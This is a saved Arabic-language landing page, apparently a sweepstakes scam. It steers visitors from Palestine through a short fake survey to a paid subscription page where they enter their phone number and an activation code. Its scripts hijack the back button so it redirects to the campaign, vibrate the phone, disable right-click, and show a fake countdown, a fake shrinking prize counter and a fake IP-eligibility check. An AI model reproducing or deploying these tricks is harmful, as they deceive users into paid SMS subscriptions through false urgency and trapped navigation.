
<!-- saved from url=(0046)http://special-dealss.com/bbcplast/index.html# -->
<html style="direction: rtl;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <!--<base href="">--><!--<base href=".">-->

  

  
  <script type="text/javascript" async src="./landing11_files/w.js"></script><script type="text/javascript" async src="./landing11_files/w(1).js"></script><script type="text/javascript">
    navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
if (navigator.vibrate) {
    navigator.vibrate([1000, 500, 1000, 500, 1000, 500]);
}
  </script>

<script type="text/javascript">
    function exit_a1() {
      alert("شكرا لك  \n\n***القواعد*** \n\n1.  ادخل رقم هاتفك في الصفحه التاليه وانتظار رمز التفعيل  .\n\n2. إضغط 'موافق' للمتابعة.\n\n3.ويرجى قراءه الشروط والاحكام");
    }
    
  </script>

  

 <script>
    function getURLParameter(name) {
      return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
      );
    }

    var brand = getURLParameter('brand');
    var model = getURLParameter('model');
    var city = getURLParameter('city');
    var device = model;
  </script>

 
 <meta name="viewport" content="initial-scale=1">
 <meta name="google" value="notranslate">

 <link rel="stylesheet" type="text/css" href="./landing11_files/style.css">
 <title>تهانينا</title>

<script type="text/javascript">
  !function(){
    var campaign_link = "http://www.offers.ps/offersWeb/platform/LandingPage/index.php?L=4280272&A=2117966&hash=<?php  echo($_REQUEST['hash']); ?>&hash2=<?php  echo($_REQUEST['hash2']); ?>Land11";
    var t;             
    try{
      for(t=0;10>t;++t)history.pushState({},"","#");
      onpopstate=function(t){t.state&&location.replace(campaign_link)}}
    catch(o){}
  }();
</script>
<script async charset="utf-8" type="text/javascript" src="./landing11_files/clickstream.js" crossorigin="anonymous"></script><script async charset="utf-8" type="text/javascript" src="./landing11_files/clickstream(1).js" crossorigin="anonymous"></script></head>
<body oncontextmenu="return false">
 <div class="wrapper">
  <div class="header clearfix" style="text-align: center;padding:0;">
   <span class="menu"></span>
   <!-- <img src="ﻣﺴﺎﺑﻘﺔ ﻣﻮﻗﻊ ﺑﻲ ﺑﻲ ﺳﻲ ﻟﺪﻭﻟﺔ ﻓﻠﺴﻄﻴﻦ_files/logo (1).gif" class="yticon" style="height: 40px;" > -->
   <span class="name">تهانينا </span>
   <span class="search"></span>
  </div>
  <div class="heading" style="font-size: 20px;"><strong>تهانينا عزيزي الزائر <br>
    انت مؤهل للاشتراك بخدماتنا والدخول على السحب 
  </strong></div>
  <img src="./landing11_files/main.jpg" class="mainimg">
  <div class="content">
    <h2 style="
    font-size: 17px;
">نحن نقوم بتحويل هذه الصفحه لمتصفحي موقعنا المميزين , ونتيح لهم فرصه الاشتراك بخدماتنا والدخول على السحب على جوائز قيمه
<br>
      <br>
    </h2>
<!--     <div>
      <p style="
    font-size: 17px;
" >يمكنك الاختيار بين <strong>الفوز بـ 10000 شيكل / جنية فلسطينى أو ايفون 7 بلص <strong> </strong></strong></p>
      <p><strong><strong></strong> .</strong></p>
    </div> -->
    <p class="txt"><br>
    </p>
    <div style="
    font-size: 17px;font-weight: bold;
" id="asdf">
      <p><span id="aaaa"><strong>هل أنت مهتم فعلا  بالاشتراك بالخدمات والحصول على هدية جد قيمة ، إذن كل ما عليك فعله هو تعبئه الاستبيان التالي لكي تساعدنا في معرفه توجهات مشتركينا<br>
        <br>
        أنضم الآن ! تلقي 4 من مستخدمي آخرين جوائزهم وهناك جائزه واحده فقط</strong></span><strong> </strong></p>
      <span id="a"><br>
    </span></div>
    <br>
    <h1><span style="padding:10px;border:5px dotted black;color:red;&gt;ﺩﻭﻟﺔ ﻓﻠﺴﻄﻴﻦ&lt;" span=""> فقط للزوار القادمين من : فلسطين</span></h1>
</div><div class="contentquizz"><p class="txt"> </p><center>
  اﻟﺮﺟﺎء اﻹﺟﺎﺑﺔ ﻋﻠﻰ اﻷﺳﺌﻠﺔ اﻟﺘﺎﻟﻴﺔ ﺑﺪﻗﺔ،
   </center>
  <div class="questions">
    <div class="questions">
   <div class="q" id="q1">
    <p>ما نوع الجهاز الخلوي الذي تفضله</p>
    <button>جلاكسي  </button>
    <button>ايفون </button>
   </div>
   <div class="q" id="q2">
    <p>ما نوع لخدمات التي تفضلها </p>
    <button>ترفيهيه </button>
    <button>منوعات </button>
   </div>
   <div class="q" id="q3">
    <p>كيف تفضل ان تصلك الخدمات </p>
    <button>رسائل قصيره </button>
    <button>رسائل مع رابط</button>
   </div>
   <div id="final">
    <img src="./landing11_files/loader.gif">
    <p class="loadertxt">جاري فحص اﻻﺟﺎﺑﺎﺕ</p>
   </div>
   <div id="finalcta">
    <p class="gz">  الجائزه ما زالت متاحه </p>
    <!--<p class="ct">يوجد فقط  <span style="color:red; ">1</span> جائزه متاحه</p>-->
   <p style="text-align:center;" class="txt">
     اضغط هنا للتحويل الى صفحه الاشتراك والدخول على السحب ويرجى تعبئه رقم الهاتف وانتظار رمز التفعيل للتاكد انك صاحب رقم الهاتف 
   </p>
<span onclick="exit_a1();"><a class="cta" href="http://www.offers.ps/offersWeb/platform/LandingPage/index.php?L=4280272&A=2117966&hash=<?php  echo($_REQUEST['hash']); ?>&hash2=<?php  echo($_REQUEST['hash2']); ?>Land11">اضغط هنا </a>
   </span></div>
</div></div><center><span style="font-weight: bold;">ﻟﺪﻳﻚ ﻓﻘﻂ 03:56 ﺩﻗﻴﻘﺔ ﻟﻹﺟﺎﺑﺔ ﻋﻠﻰ اﻷﺳﺌﻠﺔ ﻗﺒﻞ ﺃﻥ ﻳﺒﺪﺃ ﺷﺨﺺ ﺁﺧﺮ ﺑﺄﺧﺬ ﻣﻜﺎﻧﻚ. ﺣﻈﺎ ﻃﻴﺒﺎ!</span></center></div>
   
  
</div>
 


<script src="./landing11_files/jquery.min.js"></script>
<script type="text/javascript">

function checkZero(a) {
 if(a<10) return "0"+a;
 else return a;
}
function timer(a,b) {
 var min = checkZero(Math.round((a-30)/60));
 var sec = checkZero(a%60);
 $(b).html(min+":"+sec);
 var t = setInterval(function() {
  a--;
  min = checkZero(Math.round((a-30)/60));
  sec = checkZero(a%60);
  $(b).html(min+":"+sec); 
  if(a == 0) clearInterval(t);
 }, 1000);
 return false;
}
function showCom(a,b) {
 setTimeout(function() {
  var m = 0, n = true, op = 0;
  $(a).slideDown(500);
  var t = setInterval(function() {
   op += 0.2;
   $(a).css({"opacity":op});
   m++;
   if(m == 5) clearInterval(t);
  }, 100);
 }, b);
}
function random(min, max) {
 return Math.round(Math.random() * (max - min) + min);
}
$(document).ready(function() {
 var disabled = false;
 
 timer(300,".timer")
 showCom("#com4",1500);
 showCom("#com5",5000);
 showCom("#com6",8800);
 showCom("#com7",15900);
 showCom("#com8",26800);
 showCom("#com9",28250);
 showCom("#com10",31000);
 showCom("#com11",41300);
 showCom("#com12",51750);
 showCom("#com13",62055);
 $(".comlike").click(function() {
  var comlike = parseInt($(this).html());
  if($(this).hasClass("selected")) {
   $(this).html(--comlike);
   $(this).removeClass("selected");
  } else {
   $(this).html(++comlike);
   $(this).addClass("selected");
  }
 });
 $(".likeus").click(function() {
  if(disabled == false) {
   if($(this).hasClass("selected")) $(this).removeClass("selected");
   else $(this).addClass("selected");
   disabled = true;
  }
 });
 var ct = 1420;
 (function loop() {
  var rand = random(2000,4500);
  var ctrand = random(4,9);
  ct = ct - ctrand;
  if(ct > 5) {
   setTimeout(function() {
             loop();  
      }, rand);
  } else {
   ct = "few";
  }
  $("#ctrand").html(ct);
 }());
});
</script>
<script type="text/javascript">
function clicker(a) {
 $("#q"+a+" button").click(function() {
  if(a < $(".q").length) {
   $("#q"+a).fadeOut(250, function() {
    $("#q"+a).next().fadeIn(250);
   });
  } else {
   $("#q"+a).fadeOut(250, function() {
    $("#final").fadeIn(250, function() {
     ctafinal();
    });
   });
  }
 });
}
function ctafinal() {
 setTimeout(function() {
  $(".loadertxt").txtFader("3/3) ﺃﺟﺒﺖ اﻟﺜﻼﺙ ﺃﺳﺌﻠﺔ)");
  setTimeout(function() {
   $(".loadertxt").txtFader("ﻻ ﺗﻮﺟﺪ ﺃﻱ ﻣﺸﺎﺭﻛﺔ ﺳﺎﺑﻘﺔ ﻋﻠﻰ ﻋﻨﻮاﻥ ﺑﺮﻭﺗﻮﻛﻮﻝ اﻻﻧﺘﺮﻧﺖ ﻫﺬا.!");
   setTimeout(function() {
    $("#final").fadeOut(250, function() {
     $("#finalcta").fadeIn(250);
    });
   }, 3000);
  }, 3000);
 }, 2500);
}
$.fn.txtFader = function(a,b) {
 this.fadeOut(b, function() {
  $(this).html(a).fadeIn(b);
 });
}
function FBcom(a,b) {
 setTimeout(function() {
  var m = 0, n = true, op = 0;
  $(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);
  $().slideDown(500);
  var t = setInterval(function() {
   op += 0.2;
   $(a).css({"opacity":op});
   m++;
   if(m == 5) clearInterval(t);
  }, 100);
 }, b);
}
$(document).ready(function() {
 FBcom("#fb1",3000);
 FBcom("#fb2",5000);
 FBcom("#fb3",7000);
 FBcom("#fb4",9000);
 FBcom("#fb5",10500);
 FBcom("#fb6",13000);
 FBcom("#fb7",15000);
 FBcom("#fb8",20000);
 $(".like").click(function() {
  if($(this).hasClass("selected")) {
   $(this).removeClass("selected");
   $(this).html("Like");
   $("#youand").html("");
  } else {
   $(this).addClass("selected");
   $(this).html("Unlike");
   $("#youand").html("You and ");
  }
 });
 $(".fblike").click(function() {
  if($(this).hasClass("selected")) {
   $(this).removeClass("selected");
   $(this).html("Like");
  } else {
   $(this).addClass("selected");
   $(this).html("Unlike");
  }
 });
 for(var x = 1;x<=$(".q").length;x++) {
  console.log(x);
  clicker(x);
 }
});
</script>


<script>
/*$(document).bind('keydown keypress', 'ctrl+s', function(){
  $('#save').click(); 
  return false;
});*/
</script>

<script type="text/javascript">
var answer = confirm ("ﺗﻬﺎﻧﻴﻨﺎ عزيزي الزائر \n\n لديك فرصه ذهبيه للاشتراك على خدماتنا والدخول على السحب وفرصه الفوز بجوائز قيمة ")
//if (answer)
 //window.location="#"

</script>


<script type="text/javascript">
/*window.__lo_site_id = 90636;

	(function() {
		var wa = document.createElement('script'); wa.type = 'text/javascript'; wa.async = true;
		wa.src = 'https://d10lpsik1i8c69.cloudfront.net/w.js';
		var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wa, s);
	  })();*/
	</script>



</body></html>